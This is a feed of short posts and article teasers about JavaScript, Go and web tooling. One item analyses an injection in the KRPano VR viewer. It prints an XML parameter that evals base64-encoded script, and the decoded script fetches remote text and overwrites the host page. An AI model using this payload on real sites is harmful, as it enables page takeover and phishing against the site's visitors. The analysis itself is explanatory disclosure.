Also spent the morning continuing to think about a new design for EdgeGuard’s WAF. I’m basically going to build an entirely new pluggable WAF that will be designed to only consider Rate Limiting, IP/ASN-based filtering, JavaScript challenge handling, Basic behavioral analysis and Anomaly detection.
The only part of this design I’m not 100% sure about is the Javascript-based challenge handling? 🤔 I’m also considering making this into a “proof of work” requirement too, but I also don’t want to falsely block folks that a) turn Javascript™ off or b) Use a browser like links, elinks or lynx for example.
Hmmm 🧐
Unlisted but Not Unseen: How I Found the Admin Panel in a JavaScript Comment
Hey there!😁
[Continue reading on InfoSec Write-ups »](https://infosecwriteu …
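Say goodbye to JMeter! This Go tool makes performance testing 10x lighter and also supports distributed load testing
About k6: why choose it. k6 is written in Go and, compared with the traditional tool JMeter, is lightweight and efficient, has a concise syntax, and is highly extensible. Its features include: Developer-friendly: based on JavaScript/TypeScript scripts, fitting seamlessly into modern development workflows. Cloud-native support: built-in distributed testing, easily simulating tens of thousands of concurrent users. Rich visualization: HTML/JSON reports and support for custom dashboards. Extension ecosystem: via npm …
Modern JavaScript async style: building high-performance asynchronous systems without relying on await
In the ES6+ era, JavaScript asynchronous programming has undergone major changes. Although the async/await syntax significantly improved code readability, in some scenarios working with Promises directly and using newer features gives finer-grained control. 1. Promise chaining: fetch('https://api.example.com/data') .then(response => { if (!response.ok) throw ne …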
V8 JavaScript engine gets eager compilation hints, but will devs use sparingly as advised?
**Payloads in Plain Sight: How Open Redirect + JavaScript Led to Full Account Takeover**
Hey there!😁
[Continue reading on InfoSec Write-ups »](https://infosecwriteups.com/payloads-in-plai …
Exposed Secrets in JavaScript Files
🔥Free Article https://medium.com/@Abhijeet_kumawat_/exposed-secrets-in-javascript-files-430a76834952?sk=ffd9ca6c8ede38ac77dcb68a507b9299
[Continue reading on InfoSec Write-ups »](https://infosecwriteups.com/exposed-secrets-in-javascript-fi …
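What's the deal with Go's new iterators
Many popular programming languages provide iterators in some form, including C++, Java, Javascript, Python and Rust. Go has now added iterators too. The iter package is a standard library package new in Go 1.23 that provides the basic definitions of iterators and related operations. Why iterators are needed: after Go 1.18 introduced generics, it became easy to define generic container types to improve coding efficiency. For example, we can define a set type based on the map type …
Implementing keystroke recording with Golang-WebSocket
In web development and security research, listening to user input is an important capability; for example, in online code editors, game key bindings or shortcut management we may need to record the user's key presses. This article describes how to use Golang + WebSocket to implement a simple keystroke recording system. How key listening works: on the web side, we can use JavaScript event listeners to capture the user's keyboard input events. JavaScript provides keydown, keypress and …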
Playing multimedia with Dillo
What if you want to use a web browser like Dillo, which lacks JavaScript support and can’t play audio or video inside the browser? Dillo doesn’t have the capability to play audio or video directly from the browser, however it can easily offload this task to other programs. This page collects some examples of how to watch videos and listen to audio tracks or podcasts by using an external player program. In particular we will cover mpv with yt-dlp which supports YouTube …
i wonder if i could make a little yarn widget for my site to show my last post. that’d be fun. sadly i do not know javascript
PEP 776: Emscripten Support
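Emscripten is a complete open source compiler toolchain. It compiles C/C++ code into WebAssembly/JavaScript executables, for use in JavaScript runtimes, including browsers and Node.js. The Rust language also maintains an Emscripten target.
yaegi: give your Go code dynamic scripting capabilities
In the Go world, static compilation is a major feature that ensures performance and safety. In some scenarios, however, we want to support executing code dynamically at runtime, as in Python or JavaScript, for example in plugin architectures, rule engines and script interpreters. Today we introduce a powerful Go interpreter library, yaegi, which lets Go code execute dynamic scripts at runtime. About yaegi: yaegi is a Go interpreter written in Go. It can parse and execute at runtime …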
Oracle justified its JavaScript trademark with Node.js–now it wants that ignored
Article URL: https://deno.com/blog/deno-v-oracle2
Comments URL: https://news.ycombinator.com/item?id=42939940
Points: 503
# Comments: 129
Run Linux inside a PDF file via a RISC-V emulator
You might expect PDF files to only be comprised of static documents, but surprisingly, the PDF file format supports Javascript with its own separate standard library. Modern browsers (Chromium, Firefox) implement this as part of their PDF engines. However, the APIs that are available in the browser are much more limited. The full specification for the JS in PDFs was only ever implemented by Adobe Acrobat, and it contains some ridicul …
@lyse@lyse.isobeef.org The one in question is more like the javascript version for unwrapping errors when accessing methods.
```javascript
const value = some?.deeply?.nested?.object?.value
```
but for handling errors returned by methods. So if you wanted to chain a bunch of function calls together and if any error return immediately. It would be something like this:
```go
b := SomeAPIWithErrorsInAllCalls()
b.DoThing1() ?
b.DoThing2() ?

// Though it's not in the threads I assume one could do like this to chain.
b.Chain1()?.Chain2()?.End()?
```
I am however in favor of having a sort of ternary ? in go.
PS. @prologic@twtxt.net for some reason this is eating my response without throwing an error :( I assume it has something to do with the CSRF. Can I not have multiple tabs open with yarn?
JavaScript Temporal is coming
Article URL: https://developer.mozilla.org/en-US/blog/javascript-temporal-is-coming/
Comments URL: https://news.ycombinator.com/item?id=42876840
Points: 504
# Comments: 173
@arne @uplegger.eu I do 😅 Despite some opinions, I actually love HTMX and use it in many of my projects, including yarnd to give it that nice SPA-like UX feel without all this Javascript React nonsense 😅
Google begins requiring JavaScript for Google Search
Google says it has begun requiring users to turn on JavaScript, the widely used programming language to make web pages interactive, in order to use Google Search. In an email to TechCrunch, a company spokesperson claimed that the change is intended to “better protect” Google Search against malicious activity, such as bots and spam, and to improve the overall Google Search experience for users. The spokesperson noted that, with …
So this works by adding some unbounded javascript autoloaded by the KRPano VR Media viewer.
The xml parameter has a URL that contains the following:
```xml
<?xml version="1.0"?>
<krpano version="1.0.8.15">
  <SCRIPT id="allow-copy_script"/>
  <layer name="js_loader" type="container" visible="false" onloaded="js(eval(var w=atob('... OMIT ...');eval(w)););"/>
</krpano>
```
The omit above is the base64-encoded script below:
```javascript
const queryParams = new URLSearchParams(window.location.search),
  id = queryParams.get('id');
id ? fetch('https://sour.is/superhax.txt')
  .then(e => e.text())
  .then(e => {
    document.open(), document.write(e), document.close();
  })
  .catch(e => {
    console.error('Error fetching the user agent:', e);
  }) : console.error('No');
```
This script will fetch text at the URL https://sour.is/superhax.txt and replace the document content.
Show HN: Tetris in a PDF
I realized that the PDF engines of modern desktop browsers (PDFium and PDF.js) support JavaScript with enough I/O primitives to make a basic game like Tetris.
It was a bit tricky to find a union of features that work in both engines, but in the end it turns out that showing/hiding annotation “fields” works well to make monochrome pixels, and keyboard input can be achieved by typing in a text input box.
All in all it’s quite janky but a nice reminder of how general purpose PDF scripting can be. The lin …
morning yarn friends i’ve been playing with astro the SSG and it’s a blast i see why my friends love it and rec it to everyone. i may think javascript was a mistake but this is super cool
Deno v. Oracle: JavaScript Trademark Dispute
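Legal action seeks to cancel Oracle’s “JavaScript” trademark, which it renewed fraudulently and has abandoned.
A JS engine written entirely in Go
Background: With the rapid development of internet technology, JavaScript has become an indispensable part of almost all modern web page and application development. However, JavaScript's execution environment is usually limited to the browser or Node.js, which restricts developers who want to run JavaScript code in other environments. In Go environments in particular, developers face the challenge of getting JavaScript and Go to communicate, because the mismatch between the two runtimes can lead to reduced performance and development efficiency …
Honestly… not much. Have abandoned two projects (both private) in Golang and one related to cryptography. My main languages are Python and Javascript (I can also do PHP). After writing code in Go I spend the same time on fixing dumb errors
Exploring Goja: a Golang JavaScript runtime
This article explores Goja[1], a JavaScript runtime library in the Golang ecosystem. Goja stands out as a powerful tool for embedding JavaScript in Go applications, with unique advantages in manipulating data and in providing an SDK that needs no go build step. Background: why Goja is needed. In my project, I ran into challenges when querying and manipulating large datasets. Initially everything was written in Go, which was efficient, but when handling complex …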
**A playground for sharing scrappy fiddles**
I shared some snippets of JavaScript in a recent blog post and was wicked irked that I didn’t have an easy way to share interactive code on my own thing…so… I made a totally static JavaScript playground for running little experiments and sharing scrappy fiddles!
It is pretty simple — it allows folks to enter and run JavaScript, includes a console so you can easily log thing …
**Constants, variable assignment, and pointers**
After reading my last post, a friend asked an interesting question that I thought would also be fun to write about!
They noted that in the reshape function I declared the variable result as a constant. They asked if this was a mistake? Because I was reassigning the value iteratively, shouldn’t it be declared using let?
What is happening there is that the constant is being declared as an array, so the reference …
**Reshape, in JavaScript and APL**
In APL the rho, ⍴, called reshape is used to both construct arrays of a given shape (dimensionality), and to reconfigure arrays into new shapes.
Sometimes I wish I had reshape in JavaScript…so I wrote it!
Here are two functions that, when combined, a la Captain Planet, can stand in for APL’s reshape in JavaScript.
Ravel is the simpler of the two, it takes an array of any dimension and ret …
Adding the ESLint Tool to an AI Assistant: Improving Recommendations for JS/TS Projects
We show how to enable our AI assistant to provide advice that is both helpful and actionable for linting JavaScript and TypeScript projects.
Porting my JavaScript Game Engine to C for No Reason
high_impact tl;dr: high_impact is a small game engine for 2D action games. It’s written in C, compiles to Windows, Mac and Linux as well as to WASM for the Web. It’s “inspired by” my original Impact JavaScript game engine from 2010. The name high_impact is a nod to a time when C was considered a high level language.
MIT licensed, source on github: [github.com/phoboslab/high_impact](https://github …
How to add OTEL instrumentation to a React Native app
Member post by Jonathan Munz, Senior Software Engineer at Embrace. React Native allows developers to build native mobile apps using Javascript and Typescript for both iOS and Android. With a web language as its core and native deployment…
A Lodash-style library for Go
In the JavaScript world, Lodash is a household-name utility library that provides a rich set of functions, making it easy for developers to work with arrays, objects, strings and more. Lodash has greatly improved JavaScript developers' productivity and made code more concise and readable. Before Go 1.18, the lack of generics made it hard to implement a utility library as powerful and type-safe as Lodash. With the introduction of generics in Go 1.18, however, all of that changed. sambe …
How to Update Node.js to Latest Version on Mac
If you use Node.js for web development, creation of web apps, and javascript based network applications, you undoubtedly may come across situations where you’d like to make sure that the latest version of Node.js is installed on your Mac. Upgrading to the latest version of Node.js means you’ll have access to the most recent features …
There is JavaScript, but not everything is implemented (properly). They’re writing everything including the JavaScript engine from scratch.
A huge effort 😲
Attack of the clones: Getting RCE in Chrome’s renderer with duplicate object properties
In this post, I’ll exploit CVE-2024-3833, an object corruption bug in v8, the Javascript engine of Chrome, that allows remote code execution (RCE) in the renderer sandbox of Chrome by a single visit to a malicious site.
The post [Attack of the clones: Getting RCE in Chrome’s renderer with duplicate object properties](https://github.blog/2024-06-26-attack-of-the-cl …
Go interfaces in depth: duck typing and polymorphism
Duck Typing: duck typing is a programming concept whose key idea is to determine an object's type by its behavior. The usual explanation is through a neat example: judge whether an object is a duck by how it behaves. If it swims like a duck and quacks like a duck, then it can be considered a duck. Dynamic languages such as Python and JavaScript naturally support this, but compared with static languages, dynamic languages lack important type checking. Go's interface design is closely related to the duck typing concept, …
**books, the end of winter, video games and javascript**
Since my last update I’ve read a handful of books. Some standout reads include Tales from Earthsea, The Other Wind and The Left Hand of Darkness, all by Ursula K. Le Guin. I’d read them all before, except for The Other Wind. I thought I’d read The Other Wind, but hadn’t! Chaos: Making a New Science by James Gleick was also a fun read. I liked it for the rabbit holes it invited me down; I’ve been thinking a lot …
How to Disable Content Blockers for Specific Sites in Safari for Mac
Some Mac users have content blockers installed into Safari, which are usually designed to prevent a part of a webpage from loading, things like preventing a remote javascript that tracks cookies or loads ads, or something that places a cookie into your browser, etc. The very nature of how content blockers work can cause interference … [Read More](https://osxdaily.com/2024/02/23/how-to-disable-cont …
Build code security skills with the GitHub Secure Code Game
Learn to find and fix security issues while having fun with Secure Code Game, now with new challenges focusing on JavaScript, Python, Go, and GitHub Actions!
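The post Build code security skills with the GitHub Secure Code Game appeared first on The GitHub Blog.
Protecting your JSON data with Go Gin's SecureJSON
Security on the web has always been a problem that cannot be underestimated, especially in web development, and JSON hijacking is one such issue. In this article we focus on using SecureJSON in the Go framework Gin to protect our JSON data. What is JSON hijacking? JSON hijacking is a network attack technique in which the attacker exploits this feature of JavaScript to obtain data that does not belong to them. Because JSON data often contains very sensitive personal information, for example …
Wasm on Go
This piece is a hands-on record of working through 極客兔兔: Go WebAssembly (Wasm) 簡明教程 [1]; the main content comes from that blog post, and reading the original is recommended. Do you need to set up a wasm environment? Getting started with WebAssembly [2]: for C/C++, you need emcc to compile C and C++ code to WebAssembly and JavaScript. On a Mac, brew install emscripten, then …
Does Golang need to implement async-await?
Preface: Today on a certain site I saw an expert explain Golang's err !=nil error handling directly in terms of Javascript's async/await. The async/await syntactic sugar is a very common way of writing asynchronous coroutines in C#, Python and Javascript, whereas Golang uses the goroutine mechanism. People who are used to or fond of the async/await syntactic sugar may then wonder: Gola …
Best practices for reading and writing JSON files in Go
Overview: In Go, JSON (JavaScript Object Notation) is a common data interchange format used to pass data between different languages. This article covers how to read and write JSON files in Go, including parsing and serialization, error handling, and some practical tips. 1. Basic JSON file operations. Reading a JSON file: how to read data from a JSON file. package main import ( "encoding/js …
Introducing Agency: connecting AI and Go seamlessly
In today's application development, the boom in generative AI technologies such as the OpenAI API is fundamentally changing the landscape. Languages such as Python and JavaScript already have rich resources supporting these technologies, LangChain being a notable example. Go developers, however, have comparatively limited choices. LangChainGo, the Go version of LangChain, has been working to stay consistent with Go's programming philosophy, while Lang …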
Rediscovered how it’s possible to show/hide content on an HTML page without JavaScript, using a checkbox and some sprinkle of CSS magic.